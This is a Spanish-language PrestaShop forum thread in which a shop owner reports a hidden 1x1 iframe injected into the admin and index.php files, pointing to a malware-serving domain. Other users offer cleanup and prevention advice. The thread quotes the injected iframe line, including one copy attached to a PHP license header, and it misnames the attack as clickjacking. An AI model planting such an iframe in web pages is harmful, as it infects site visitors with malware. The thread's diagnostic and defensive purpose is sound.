SECURITY WARNING que es esto???? <iframe src="http://gratwall.vv.cc/......

[kilota]

Hola a todos.
Esta mañana no podia entrar al modo de administracion de mi tienda.
En el principio mi antivirus ESET NOD32 encontre un virus

16/05/2011 11:14:10 Filtro HTTP archivo http://gratwall.vv.cc/showthread.php?t=991524 una variante de Win32/Kryptik.NTW Troyano conexión finalizada - puesto en Cuarentena. Se ha detectado una amenaza accediendo a un sitio de Internet a través de esta aplicación: C:\Program Files\Java\jre6\bin\java.exe.

Y dispues de esto la pagina web queda en blanco.
Dentro en archivos admin/index.php y admin/login.php encontrado en el principio el siguiente codigo

<iframe src="http://gratwall.vv.cc/showthread.php?t=80480463" width="1" height="1" frameborder="0"></iframe>

Eliminando este codigo ya podia entrar al modo de admin.
Otros archivos OK.
Que y como puede ser esto?????
Alguna idea.

P.S. Tengo la version 1.4.1.0 de prestashop.

[kilota]

Recibido un email a mi tienda:

Email: [email protected]

Mensaje: Hola he visto el post que has puesto en http://www.prestashop.com/forums/viewthread/109697/discusin_general/security_warning_que_es_esto__ltiframe_srchttpgratwall_dot_vv_dot_cc_dot__dot__dot__dot__dot__dot_

y te queria decir que a mi me pasa algo similar.
Tengo una web y desde esta mñana habia notado algo raro,no se me cargaba del todo.
Hoy me meto a mi web desde mi iPhon y veo que se me habia desconfigurado la web con una publicidad que ponia gratwall.vv.cc y enlaces de dominio.
Queria saber que has tenido que tocar para que desapareciera ati y si has tenido que cambiar algo o modificar algo.

MUY RARO.... PORQUE NO POSTEADO AQUI?????

Encontre otro mas en index.php , /themes/mitemplate/index.php,

TODOS LOS ARCHIVOS index.php ESTA CON ESTOS CODIGOS

<iframe src="http://gratwall.vv.cc/showthread.php?t=80480463" width="1" height="1" frameborder="0"></iframe><?php
/*
* 2007-2011 PrestaShop 
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA 
*  @copyright  2007-2011 PrestaShop SA
*  @version  Release: $Revision: 1.4 $
*  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/

QUE M.....A ESTO????

Entonces esto un virus o como????

[tamu secreto]

La tecnica se llama : clickjacking

http://en.wikipedia.org/wiki/Clickjacking

te estan robando las session de tus clientes, tambien pueden estar subiendo archivos .

¿para que hacen esto? tal vez para aplicar tecnicas Phishing

http://es.wikipedia.org/wiki/Phishing

de este modo robaran contraseñas de paypal de tus clientes, o podran recibir el pago de sus compras mientras tu no recibiras nada.... en el mejor de los casos tal vez solo se trate de un lamer http://es.wikipedia.org/wiki/Lamer
prondo algun manual o programa distribuido en alguno foro o web...



deberas eliminar todos los archivos, elimina tambien las imagenes, si no quieres hacer esto deberas analizar cada imagens en busca de shell, pero esto es complicado.

tambien deberas restaurar tu BD de datos.

SI no tienes una copia de seguridad lo lamento :-(


por otro lado mira en el LOG de tu hosting, busca rastros como para ver como entraron ( a un que esta claro que por tu pc)...


Pero es bueno que comentes esto, para que sirvan a otros que piensan que esto no sucede..

RECOMENDACIONES PARA TODOS:

- NO INSTALEN MODULOS DESCARGADOS DE PROGRAMAS P2P
- NO INSTALEN THEMES DESCARGADOS DE PROGRAMAS P2P O PAGINAS WAREZ O SIMILARES.
- NO INSTALEN RELOJES FLASH O REPRODUCTORES FLASH QUE NO POSEAN SU RESPECTIVO FLA Y AUN QUE LOS TENGAN CREEN USTEDES MISMO SWF , SI NO SABEN ACTION SCRIPT NO INTALEN FLASH AJENOS.

- NO USEN NUNCA MODULOS DESCARGADOS DE PAGINAS, FOROS, TIENDAS, BLOGS ETC QUE NO PERTENESCAN A INTEGRANTES DEL FORO OFICIAL

- TODO MODULO DEBEn ESTAR RELACIONADO A USUARIOS DE ESTE FORO. EL OFICIAL.


PD: Formatea tu pc, hace tu tienda desde cero...
cambia tus contrasñas paypal y de toda pagina de cobro, avisa a la gente de paypal del asunto por si ya ha avido alguna estafa.

cambia todas tus contraseñas...

avisa a la gente de tu hosting.
si estas en un hosting compartido, cambia de hosting. (lo barato sale caro)

si tu anti virus NOD 32 no es legal, compra uno, recuerda que el nod si no es legal se torna agresivo, lo mismo sucede si usas mas un antirvirus con nod...

instala programas de limpieza para tu pc. antivirus legales y conocidos.

Agrega en themes/header.tpl

busca alli esto :

var token = '{$token}';

agrega justo despues de eso esto :

if (top.location != location) top.location = self.location;

tambien puedes utilizar la herramienta de google para codigo malicioso, esta te alertara de este tipo acciones...
mas info en http://www.google.es/webmasters/

saludos y suerte!!

PD: NO eres el unico : aqui tienes mas damnificados

osco
http://forums.oscommerce.com/topic/375287-code-injected-in-my-php-files/

drupal
http://drupal.hu/forum/feltört-webtárhely

joomla
http://www.joomlaportal.de/allgemeine-fragen-zu-joomla-1-5/252656-mysteri-se-fehlermeldungen-warning-session_start.html

en fin hay miles de casos y en todos los idiomas, normalmente suceden en open-sources, y si lees el asunto viene de troyanos o de back-doors desde los mismas paginas.

en cuanto al dominio gratwall .vv . cc son gratis cualquiera puede crear un dominio en vv . cc